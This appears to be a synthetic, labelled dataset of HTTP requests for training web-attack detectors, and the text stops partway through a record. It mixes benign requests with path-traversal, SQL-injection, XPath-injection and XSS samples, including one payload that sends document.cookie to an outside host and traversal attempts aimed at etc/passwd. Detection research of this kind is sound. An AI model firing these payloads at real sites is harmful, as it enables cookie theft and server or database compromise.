Accept: application/*, audio/basic, video/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: znriozs-quusdLo;q=0.5, a1rp-Mlyj, 6s-l, res-txe;q=0.1, nOue-Oh;q=0.6
Cache-Control: max-stale=2675
Client-ip: 231.14.230.156
Cookie: lif=arr9dstdinctea@h;uuooattwh=0155807741;pten9pi9eset=19625
Cookie2: $Version="38"
Date: Sat, 01 May 10 10:05:39 UTC
ETag: "0zoPlb3v_hszAj8-"
Expect: 100-continue
From: Aboesy@tnEn1d.uk
If-Modified-Since: Wed, 20 Oct 04 11:03:57 GMT
If-Unmodified-Since: Fri, 06 Aug 04 23:39:44 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Dec 06 06:56:14 UTC
Max-Forwards: 0593
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aW5paHQ6ZW5uOQ==
Authorization: Basic dHRsc2E5OmJpZW5o
Range: 5458-41874
Referer: http://www.lpnuhh.com/1yhrEtsa/iirroo/anTdbtp.html
TE: gzip;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 0.6; nL-ne; rv:1.3.5) Gecko/05194976
UA-CPU: PowerPC
UA-Disp: 7894,3200,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7472x595
Via: 5.3 186.179.17.174, 6.0 87.55.152.250
Transfer-Encoding: gzip
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 019 www.crdaky7H.htm:4 "ktng2aWa3" 
X-Forwarded-For: 1.21.31.218
X-Serial-Number: 960628745817709
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25748
Start - Id: 7944
class: Valid
PUT /4nJt/eoyngdmeylih5c1aeem/DhntnpoEoyyes/nhltybt/aloEe4s0aenlnos/GbX1HulQWG/inmIArad4_q/rZb6@r5fGnYOzGPt5u/tsmomno/it8hbG1mO1vRbmjlNfc/ectitSfitffp/xedKepn2fZcF97Tj8s.mspx? HTTP/1.1
Content-Length: 202
Content-Language: uhf,qs9hete
Content-Encoding: deflate
Content-Location: /4eeh.png
Content-MD5: dGFubFJ2czdzYmxpZGhldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Jul 08 03:01:25 UTC
Last-Modified: Sat, 19 Dec 09 14:40:49 UTC
Host: 220.41.161.67
Connection: keep-alive
Accept: text/*;q=0.8, image/*;q=0.4
Accept-Charset: x-mac-japanese;q=0.0, x-mac-arabic, euc-kr, hz-gb-2312, iso-2022-jp
Accept-Encoding: compress
Accept-Language: 0ms-bs;q=0.5
Cache-Control: only-if-cached
Client-ip: 225.243.67.249
Cookie: eeiqouam=eSceHemsSadf;wztmp1Yyg9vH=O9qAar 2<;i3L1kTf@Rh2.=2861;eyssa8trsr=etis
Cookie2: $Version="5"
Date: Wed, 13 May 09 04:05:28 GMT
ETag: W/"n27WAq61tVTD_bNT8"
Expect: atro=ooe5
From: nhostr0g@gey2ahsod.de
If-Modified-Since: Sun, 07 Jun 09 01:07:56 CET
If-Unmodified-Since: Fri, 11 Nov 05 17:22:49 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Jun 09 01:17:10 UTC
Max-Forwards: 6107
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic a3B3UGl1Omh0bWl0dHhl
Authorization: Basic d2JlTm86d3N1bGJl
Range: -0226,-162
Referer: http://obesaee.cz/xEor/dTle3e/deuass/B8tQ.jsp
TE: trailers
Trailer: Upgrade
User-Agent: asajpo http://www.eOBo.ch
UA-CPU: Sparc
UA-Disp: 1557,362,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7210x017
Via: 7.3 213.205.21.199, FTP/8.5 102.35.69.162
Transfer-Encoding: compress
Upgrade: trRo/5.6, ifba/9.6, zny5I0/7.1, eloec/8.2, jblog/3.6
Warning: 024 www.O7oep.htm "aennnrtyleRmrdHsfeP" "Wed, 26 May 04 05:12:06 CET"
X-Forwarded-For: 88.220.41.73
X-Serial-Number: 940687449310
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

or8pdse=hj;hZ&BYK1HPwS6Q=sPehaeuv&dnyeoae2e=4&SssihLo=2jiI-Dk&Yb-cP6=a44x6ThK_3h&UdOtsfdA6r=ar7usw9crpiistt&dslqdlentrPtS=bsmL&tlnntWbKan=Tis&igheeezcqh=>0lu1? rhi&ee1=scriptTns|'wp-dTftebs5n8

End - Id: 7944
Start - Id: 36222
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.xnn7eg2.it:819
Connection: lendr
Accept: */*;q=0.8
Accept-Charset: euc-cn;q=0.0, euc-kr
Accept-Encoding: *;q=0.3
Accept-Language: dmeste-Nsa0nt, hteo-Ri, htmaoSs-ssusoa, 3f-ergfjeoe, a-meD;q=0.2
Cache-Control: max-age=125
Client-ip: 253.92.235.246
Cookie: Yiaibgtu6fwi=108666;3RYatd=jqA
Cookie2: $Version="6"
Date: Thu, 14 Jun 07 24:55:36 CET
ETag: W/"3f1XJysaM8JKnKP718"
Expect: b5ooxi=dd0uA
From: tictooes@rEbaola.net
If-Modified-Since: Mon, 21 Feb 05 05:42:28 CET
If-Unmodified-Since: Wed, 03 Dec 08 10:02:56 GMT
If-Match: "1KXMluEUxlWYaRsWHPP"
If-None-Match: "L5ApjO1QIDT3CZbXXwz"
If-Range: "G8UZdAebuuG3M_5-"
Max-Forwards: 4
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM YWVjZTlzYU45cmVub3RwVGVldGJpZ3RvdGw0ZXRsZkVja21zYnRuamk=
Range: 183-
Referer: http://www.toS2hlo.org/ttat/l2zi94/dxunneng/oTpon/sAEt.nsf
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: hubekot7p/1.9.8
UA-CPU: StrongARM
UA-Disp: 399,5892,8
UA-OS: Win98
Via: HTTP/5.2 www.eri0ib8.css:8671, HTTP/5.1 www.aneebj.shtml, HTTP/7.0 www.Abtrtn.html
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 003494109
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36222
Start - Id: 42600
class: SqlInjection
GET /t7ejubigoa/thab.php3?eya1syea=%27+%29++++UN%2F**%2FION+++ALL+++++SEL%2F**%2FECT++++%274seblLtno%27%2C9801%2C03%2C%27v58dlge%27%2C9+++FROM+bRnh4++WHERE+%28++++%27%27++%3D+++%27&2nwmueeiwCni=tfnog&woklhronelhu4h=loayeeh HTTP/1.1
Host: www.2dosan1rbh.biz:80
Connection: close
Accept: video/mpeg, video/mpeg;q=0.9, video/mpeg;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 120.51.46.153
Cookie: w6ibJjshutdown=xs;halaiNaifAe=4000
Cookie2: $Version="813"
Date: Sun, 22 Jan 06 06:59:45 CET
ETag: W/"YE2VikvVOlQUo3__"
Expect: 100-continue
From: ioed@oROvlcftKp.biz
If-Modified-Since: Sat, 11 Feb 06 11:53:58 CET
If-Unmodified-Since: Wed, 21 Dec 05 15:44:25 GMT
If-Match: *
If-None-Match: "gnrSP5U@A4HrjYC"
If-Range: *
Max-Forwards: 45
MIME-Version: 0.0
Pragma: allzlcoe='30rue'
Authorization: NTLM NW9kRTRhc2VvZWlFb2VneXJuaGVUYTh5aHQ0ZVR1cXBld2x3dHNtZ255bGEwMWQ=
Referer: /jsfasBt/Eymrutr/trio/iai9/tawe.zip
TE: chunked
User-Agent: esBUj2F http://www.wdmbg.biz
UA-CPU: Sparc
UA-Disp: 4133,8176,16
Via: 4.9 22.168.185.215, HTTP/0.8 57.49.12.199:59893, Aopbfi/3.3 www.oesPD.gif:32301
Transfer-Encoding: identity
Warning: 070 www.odrt.css "pawlewdifesnuntm" "Sun, 25 Mar 07 07:25:15 GMT"
X-Forwarded-For: 35.161.132.69
----: -----------

null

End - Id: 42600
Start - Id: 17194
class: Valid
GET /lqEzm7uo0AkY/tBVwKvE6Y_.bin?jrhkc=rePf&ghleaue=m%24hkenoti0&rhrkrmlAUtndL=dmo&jc0@EIMqRoptfrom=mwotue2drlnseGmMLa&zeEewelg2giEm=0759084 HTTP/1.1
Host: 105.185.18.179
Connection: keep-alive
Accept: image/png;q=0.2, application/zip
Accept-Charset: x-mac-chinesetrad;q=0.1
Accept-Encoding: *
Accept-Language: aIsi1ra-ggDqIne
Cache-Control: no-store
Client-ip: 106.60.218.207
Cookie: c1UInss=&naUcigroup byahddsne
Cookie2: $Version="969"
Date: Sun, 13 Dec 09 06:01:48 UTC
ETag: W/"QvlS@xi5IDaYCKv"
Expect: 100-continue
From: coitcHa@l0mro06.gov
If-Modified-Since: Sun, 31 Oct 04 12:59:25 GMT
If-Unmodified-Since: Sun, 09 Jan 05 18:46:29 UTC
If-Match: "yQ8ogSdbQfha37R"
If-None-Match: "pphvkDAR2vAOhgY"
If-Range: Sat, 09 May 09 10:53:03 GMT
Max-Forwards: 8
MIME-Version: 8.9
Pragma: OlsI=x
Proxy-Authorization: vntdib eYlwr465=aelnx
Authorization: NTLM b3VyYWFhQXJNbnBvdWFBdGVhYWVhd2hCbG1iaWVlZmFob2Z6dG4=
Range: 0907-97
Referer: http://eocbwr.st/thscb/cd0ow/Oipls/liO69/eoci.rar
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (Windows; U; WinNT 5.6; ov-nn; rv:5.1.2) Gecko/15477612
UA-CPU: PowerPC
UA-Disp: 150,488,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 987x645
Via: HTTP/8.3 www.eorieeh.gif, HTTP/7.1 www.o9wedauh.css
Transfer-Encoding: identity
Upgrade: Rtse4/4.8, sws/4.3, Oel/3.3, codm/2.9
Warning: 812 www.ccoeh2Ee.html:77503 "ooThVotweeu3tHanaq" "Tue, 06 Apr 10 03:04:29 UTC"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17194
Start - Id: 1199
class: Valid
GET /tj4e/eofsoi/lpye/npkcAq8gsX/eFLTQ1Oyc.nsf?LqBEpX@deleteWkW_=7905&reuRrtqtlbp0=hkI&cryE1itmhdatet=1etmpsh&W-P.CstdinO8OP90=tgd7wadotm%26ho5&ue=3643&ihtho8iuWX=tcPsbQRx4&dsALvRDo=026&ceexecfuH@xw4VS=fennetw5plou&hnv1fw7t5ea=%7ENdg&nT7aw2Tzrhdi0u=6159&I9cootan=kj8M1q&uoaear=+an9edhos HTTP/1.1
Host: www.aewuerefna.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: rhh='mc'
Client-ip: 88.196.5.169
Cookie: rKSzrz6=srrcpdnNtsgtFd3nyv;2PB4LjRlog=rtowjm 3tbi\ tte-t;derhrw=9;eeFdkspn=440601
Cookie2: $Version="977"
Date: Mon, 31 Jan 05 07:17:03 CET
ETag: "4G0pm5zalxbPsp_0"
Expect: sebt
From: stkJu@ixghnIjuI.org
If-Modified-Since: Wed, 24 Sep 08 13:06:54 CET
If-Unmodified-Since: Fri, 18 Jul 08 13:14:41 UTC
If-Match: *
If-None-Match: "FOpYlYgydZj@DZw_mQD"
If-Range: Sat, 10 Nov 07 07:22:42 GMT
Max-Forwards: 47
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM bjRvYWhzYWxxcmUwc2VhcHNvTzRvYXhoaHQ4NEFhZFRodWVJaWdsZW9zcw==
Authorization: NTLM RGthc25kdk1uYWVhM3NhYnFvamlobmRmam5pcDVpaDNpc3NhY29vZXJvZ1Flcw==
Range: 98-464662,0-189052,-66419
Referer: /AOtoh.mp3
TE: trailers,deflate,deflate
Trailer: Transfer-Encoding
User-Agent: vnelagsedf (32oaFo9; 8yZocZpipY; vsVyZkB)
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6451x169
Via: FTP/3.7 61.66.173.71, 1.9 64.188.152.130, t3rE/8.2 www.2reE7pr.gif
Transfer-Encoding: 3tss96
Upgrade: u6r/6.7
Warning: 000 44.117.86.117 "8eny" 
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 38993311139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1199
Start - Id: 26733
class: Valid
GET /4ytb4ios.jpg?ayhlen=a6shhu6os6fE&JE53=0hw&iairtmr3eks=vmserRpe&ohO.CL=71098828 HTTP/1.1
Host: www.2ewuTN.biz:80
Connection: keep-alive
Accept: image/*;q=0.1, video/*;q=0.8, video/*
Accept-Charset: isiri-3342, cp-950
Accept-Encoding: 
Accept-Language: 0ndesosq-s, c-xRtOxo;q=0.8
Cache-Control: no-cache
Client-ip: 180.91.240.171
Cookie: 1hW=ounion:t+Rose/e
Cookie2: $Version="55"
Date: Sun, 26 Sep 04 16:03:13 UTC
ETag: W/"zKHC5oP1_ptrfqFVg"
Expect: tyhinr
From: slnt@rItzvIc.net
If-Modified-Since: Fri, 12 Oct 07 08:32:40 CET
If-Unmodified-Since: Thu, 20 Oct 05 23:21:09 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Jul 09 11:22:30 GMT
Max-Forwards: 01
MIME-Version: 1.9
Pragma: W='tsliag'
Proxy-Authorization: NTLM cmFyc0VuaTF5aHRvcjJsTnRpNXNpcml3aTh1ZWRzYXRlbGgxd2VoMkFsaHJzU29u
Authorization: NTLM NHczcHNkYWNtb2RDdGVsc2dlZHJNM3UwY2VhZXMwZkF5Ym5kbHNzZWFzaA==
Range: 4-385177,-112
Referer: http://www.grc2ep.fr/Ibd9ti/6rlsazoe/vacna/oseiLgnb.dll
TE: deflate;q=0.0,trailers,trailers
Trailer: Accept
User-Agent: reqn/8.0.9.2
UA-CPU: StrongARM
UA-Disp: 212,9655,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 873x2179
Via: 6.6 143.78.4.126, 0.7 www.8dyt.js
Transfer-Encoding: identity
Upgrade: mrep/3.9, HDF/3.4, hmg/9.6, cFeer/0.4, nbtig/3.6
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 236.49.26.118
X-Serial-Number: 1194043277645
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26733
Start - Id: 448
class: Valid
GET /pe2gdjei/eobun/1UZ/phednzhpssi/dLQR4jUx7/c1uZ-A9PNyca/liihttga5uyunbects/64KwJ0R.php4?IxCo9=9dii&n1et=0302027&shfseueddtrgsi=aYIlLOJB4&betweenRFwG7LFFF4=%2Fo8r&ejra=6394757&Esg0napree=3261&la=mpthsameta7o%3Ft5m%2F%3Cl HTTP/1.0
Host: www.iTee.org
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1257;q=0.0, x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 197.41.14.27
Cookie: j9dsebit=981813121
Cookie2: $Version="63"
Date: Fri, 29 Apr 05 12:43:14 CET
ETag: W/"UelKa6dI.58lMfqUY"
Expect: 100-continue
From: okeiE@bcbeit.biz
If-Modified-Since: Fri, 15 Aug 08 09:48:07 UTC
If-Unmodified-Since: Tue, 02 Mar 04 04:16:27 GMT
If-Match: *
If-None-Match: "bR70N@ja44bcNV7D_35E"
If-Range: Wed, 27 Jun 07 14:47:59 UTC
Max-Forwards: 24
MIME-Version: 3.3
Pragma: rnknqnKe=haonii
Proxy-Authorization: Digest username="ndlN"
Authorization: Basic b3JOdTpwNm1oaA==
Range: 455400-
Referer: /rn06n1lt/AIieS/ruhu/mnri2/hbes.cgi
TE: trailers
Trailer: If-None-Match
User-Agent: aBwT5F http://www.chssRusq.cz
UA-CPU: Sparc
UA-Disp: 506,620,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7545x2141
Via: HTTP/9.7 86.171.117.42, FTP/9.3 www.EorurstP.css:1744, 3pnna/8.7 4.142.24.96
Transfer-Encoding: 7eosdr; 3thweg=aCo7
Upgrade: t9us/7.5, ceVt/6.8, Anu/0.3, Hli/0.3, y9t/6.4
Warning: 165 63.14.111.126 "qkeq62sh" "Sat, 26 Nov 05 06:33:06 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 9170010950
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 448
Start - Id: 10258
class: Valid
GET /kcmdfgsm9wm/9Utuceodstsss4ANs/nl/2rp/hJgFDj3r8V@A2uP3/nS37-Qy2U6G7KFvnH.gif?4lHa47L=yMUyY1bH.a&bpS0tndk=euo&ifiu=93265 HTTP/1.0
Host: 132.175.185.119
Connection: close
Accept: audio/*, text/xml;q=0.3, text/html
Accept-Charset: x-mac-chinesetrad, iso-8859-6;q=0.2, windows-1253
Accept-Encoding: *;q=0.8
Accept-Language: 8ror-btei;q=0.2, s6iawl-shi7nod;q=0.5, aan7e-dehsao3t;q=0.6
Cache-Control: no-store
Client-ip: 212.136.9.102
Cookie: PIN8zUf=e8Wlotcn-;3ygfsetEneaf=114971
Cookie2: $Version="771"
Date: Wed, 07 Oct 09 14:42:47 GMT
ETag: "VmT-sC1QWWlqE5YP"
Expect: 100-continue
From: re5on@alasreme.gov
If-Modified-Since: Fri, 28 Apr 06 10:23:56 UTC
If-Unmodified-Since: Sat, 26 Sep 09 11:38:50 CET
If-Match: *
If-None-Match: "v3t-49vUinTrMskmIkS"
If-Range: Sun, 02 May 10 10:18:12 CET
Max-Forwards: 3646
MIME-Version: 0.7
Pragma: ee4inht=lc
Proxy-Authorization: Digest response="09D35458eFFCF6eeB6ECbdFBEAdD11C5"
Authorization: estxp lsdyncnn=yoyw
Range: 48806-,859-40,-983
Referer: /hnohhc/GTaect/seae/nwnh.mp3
TE: chunked;q=0.0,trailers
Trailer: TE
User-Agent: Mozilla/0.6 (X11; U; Open BSD i586 6.9; o6-on; rv:8.5.2) Gecko/24058497
UA-CPU: Sparc
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0000x0475
Via: 4.1 www.oaeet.htm, FTP/8.8 67.21.144.255:0, FTP/3.4 242.226.31.200
Transfer-Encoding: deflate
Upgrade: xspt/1.2, taqm/0.9
Warning: 381 www.swT2Ci.png "AmssmipzjstT" 
X-Forwarded-For: 75.202.70.37
X-Serial-Number: 7837553364029
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10258
Start - Id: 23763
class: Valid
GET /t92jpM_0n/KcPqRETV4NCjjY/lFILxyQj4kCs/lasW.CM_W-TNOTR/nj3wC.phpMJsi/rTd/hefeRtnrc3ettoelkjo.jpeg?ornhteonIagw=6517647&arlsep3oa=gbocneic&sOckwtGmoohb=gisrtduao4U&scekeugt5m=oa90tsoslogd6944 HTTP/1.0
Host: 224.159.38.80
Connection: close
Accept: image/*;q=0.3, application/*, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: zfaEt0e='nG'
Client-ip: 139.204.120.139
Cookie: omaseremtu=928445351;8hji8i=438482;DgcMuVWu=emochaBYleootaa
Cookie2: $Version="53"
Date: Tue, 28 Aug 07 05:57:24 GMT
ETag: "RzlK9W2DHK5ziTY"
Expect: 100-continue
From: yiews@64sy.de
If-Modified-Since: Fri, 21 Nov 08 21:11:00 GMT
If-Unmodified-Since: Mon, 01 Oct 07 10:22:00 UTC
If-Match: "QoBLUAEP3lok0XWzKi"
If-None-Match: *
If-Range: Thu, 03 Apr 08 02:57:51 UTC
Max-Forwards: 9209
MIME-Version: 5.6
Pragma: 5oklw8ia='faemHt'
Proxy-Authorization: NTLM ZWJJZW1mMXRhYURudGFuc1JpZml0bmFpaWhhSWUzYWw=
Authorization: Digest cnonce="ide5"
Range: 761-,-655
Referer: http://dfylet.org/rgei7u/hkslxt/wcsUtbu.dll
TE: trailers,gzip;q=0.0,trailers
Trailer: Range
User-Agent: ete2eotXfd66
UA-CPU: 68000
UA-Disp: 492,2265,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 869x955
Via: 8.1 www.msod9r.css
Transfer-Encoding: compress
Upgrade: tcj/8.9
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23763
Start - Id: 47358
class: XSS
GET /ApxxMe/@Ekh5Q277amCJ/0oroope/eieu846hs8ntaymisTe/eenrwfredobnQnd/enlr/obu/s6VMTg7sn-DNVqdpnq/2hauen6Armni/1yew/WS2oxinsertinputOXBpassthruw8/sfwreuoiya3tttoh.aspx?A0mnE=%5B&zc6WevalAidODJw=zo&gta7nta=hn3f1&FlntfIheysa1i=vx%3Av&dsr3icxwexhI=eagl.R&ApulibsSI=169501122&tieorsNiYkab=arrfesEiYy1fdsat&mzf1t=1%7ChmhndjEdta%5Bzw&e3hgaatoeEnenn=oee&heex=be4Fw05iazu&oeijtpe=165581&9vr4aholM4ruw=l%40D&mcgtaodffao=%3Cbgsound+++++src++++%3D+%22+javascript%3A++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.eliceltr.com%2Fcgi-bin%2Fnsnd.cgi%27%2Bdocument.cookie%29%3B%5D%22++%3E&0pttsib=rtnMaodhrn&nawotjLdreSr8o=tSYKpel-eede HTTP/1.0
Host: www.San0mrdsL.uk
Connection: hcdie
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: aedl='msdo2p4a'
Client-ip: 30.118.108.110
Cookie: t2tb4O=tfss
Cookie2: $Version="10"
Date: Sun, 22 Apr 07 11:23:01 UTC
ETag: W/"p3XCw3gYqj@43qfL"
Expect: rnyes=dheroAo;tunizx
From: 1vfrn@reeDe.org
If-Modified-Since: Mon, 04 May 09 09:01:51 GMT
If-Unmodified-Since: Sun, 05 Jul 09 12:41:16 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Mar 06 22:02:17 UTC
Max-Forwards: 033
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZW5sZ3NydDNhZWtuOWxtZmFhUm5pVHJvZXNlZW9hc2FsZGlkbmRuZWh6bmU=
Authorization: tzlma dsiixmto=lersh
Range: -066761,152-
Referer: /8e6a/ocap9rA/heGlnnd9/djlo.nsf
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/7.1 (X11; U; Solaris 9.9; so-xp; rv:2.7.7) Gecko/93751081
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 605x5902
Via: aosw/7.7 www.sMasd.gif
Transfer-Encoding: deflate
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47358
Start - Id: 46381
class: PathTransversal
GET /ereat/2CQ0_/cfbnhytpilh/ywvdlivt/eLw6dSlN/e8hejofet0diyttNdyeo/QT.Lzc_hQ2/eun1iee/81sN3.dll?rds81alwnlrYata=36032842&tmfahTsh=%25cemu&l9bin09JlVbgsound8H=xzlwmr&tnlta=amtrnEto&sttdgxeqS4ds9vh=8855244203&R9y7Tfrom8kT2iw=%3Eutnnyreplacet&ee1n=gI&aauory3t3O=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&YH8FcXZmw0=i8Ult&.3FW=lfMrNOI-CBwE&i2_P0FK=2&oEu8l1fnmnOep=execi&k9sttrs=9Aa&OtjO=9640806&OarltiNbiynr=2 HTTP/1.0
Host: www.os1szs.cz
Connection: Ntea
Accept: */*;q=0.4
Accept-Charset: koi8;q=0.5, iso-8859-4;q=0.0, iso-2022-jp, x-mac-arabic
Accept-Encoding: compress, gzip, gzip;q=0.0, compress, gzip
Accept-Language: bveej1a-rsW;q=0.0, rour-9lhfur;q=0.2, soiEtS3-iIa;q=0.2
Cache-Control: no-transform
Client-ip: 86.247.207.18
Cookie: Hsomh6btjsutS=f3B;tl5spfhalhenase=4window.openEa;nrzn=etalhrqlrmtm;as_pOYB6vincludeM=uk5PwE6NjrR;egegoenn=0ddoqrsf;X8lchildfounionJj=childnp
Cookie2: $Version="86"
Date: Tue, 06 Oct 09 02:25:00 GMT
ETag: "GFsg.faK@trgN@CsoV"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Mon, 28 May 07 04:30:42 GMT
If-Match: "uFRlxiFSXngxLp2Anc11"
If-None-Match: *
If-Range: "wNk.zC30bLAvh.Qwl"
Max-Forwards: 46
MIME-Version: 1.9
Pragma: Se='sm'
Proxy-Authorization: hdes nflr9u=Tyswralt
Authorization: Digest nc=c9fbAb9B
Range: 2-1818,846125-
Referer: /nOf7sh/RrpehEH/relpd/fe6Tsue/yaNcscnn.dll
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/1.1 (compatible; Konqueror/1.5; Linux i386; y7siuicyc; 0Ii5ntis; nriqu1)
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3216x516
Via: o3r/9.7 148.141.3.138, nee/0.6 www.eaakn.jpeg
Transfer-Encoding: compress
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46381
Start - Id: 48663
class: XPathInjection
POST /2ZZDBJX5r9QkXaCbq/t2GPs-q-VwMTk/ebKwcVP7x.@t@mS6wdv/fNZvS/4KXibaQform6SGQxW/hchO/tzv/r-hmOyrphp60/Vlu@q4likeF0@xevalw/11VtQGeMEFrm/n6xlGIg8I9aJyHOjj.jpeg? HTTP/1.1
Content-Length: 215
Content-Language: etwta
Content-Encoding: gzip
Content-Location: /0stT1.mspx
Content-MD5: aW1zQWlkc25oZXFlZWVJdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Wed, 14 Dec 05 16:26:41 CET
Host: 76.19.227.174
Connection: hdR1peu9
Accept: application/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dirs3-rap, Rthh-wIvd
Cache-Control: no-store
Client-ip: 125.212.241.80
Cookie: safeenaii=85801;no4qt=032984;1ojoyp='8;0at4ae=]eelL>eMaac;snh5ou=tLCN3r8wM
Cookie2: $Version="57"
Date: Sat, 07 Nov 09 03:36:47 CET
ETag: "VLqyCk.CKfLHgYarbRgi"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Sat, 15 Sep 07 12:25:35 UTC
If-Match: *
If-None-Match: *
If-Range: "Dq@hqaIle13M7L2QGj@-"
Max-Forwards: 2
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM cXRpQWFnd2NlemgwdjBhZXNsaWRzc3NvZWV0MmVveW5sbg==
Authorization: Digest nonce
Range: 12-
Referer: http://tete.net/cN9xi/nlTsphe.tiff
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: mp9r5fmrrnfedvs
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: FTP/8.5 www.nllr.tiff
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

cbt=(i <     count(rbnoE/child::text())   and j   <     count(nDOcto/child::comment())  and    k  <     count(nlra/child::*) )&arbtawese=7136&sirc=document&xl4xGog=547

End - Id: 48663
Start - Id: 8266
class: Valid
GET /yjBscriptBh/nf0lBLa5syenii/lH92HRlwKM.shtml?3sfoSs=951 HTTP/1.1
Host: www.87siTi.fr
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-hebrew;q=0.5, windows-1254;q=0.6
Accept-Encoding: compress, compress;q=0.7, gzip, deflate, deflate;q=0.2
Accept-Language: *
Cache-Control: e='f'
Client-ip: 2.140.51.225
Cookie: pM4zbsexecG_-G=i9;D60-rIWfS=a1uAFPyd.u3;emNsf=tb2zinclude8tp;is7hnE2=hIthg3atT8ne;aadLidas=services;cae=936
Cookie2: $Version="65"
Date: Sat, 24 Sep 05 02:39:59 GMT
ETag: W/"8J1PQO1TDjIi5xZ3N"
Expect: 100-continue
From: obst2@srgtiust.it
